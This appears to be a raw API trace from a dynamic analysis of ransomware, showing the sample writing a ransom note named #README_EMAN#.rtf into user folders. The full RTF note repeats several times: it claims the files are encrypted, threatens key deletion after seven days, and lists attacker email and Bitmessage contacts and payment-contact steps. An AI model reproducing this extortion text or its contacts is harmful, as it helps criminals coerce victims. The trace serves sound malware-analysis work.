lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.683] WriteFile (in: hFile=0x2cc, lpBuffer=0x235fca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235fca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.684] CloseHandle (hObject=0x2cc) returned 1 [0289.684] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\#readme_eman#.rtf")) returned 0xffffffff [0289.684] GetLastError () returned 0x2 [0289.684] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 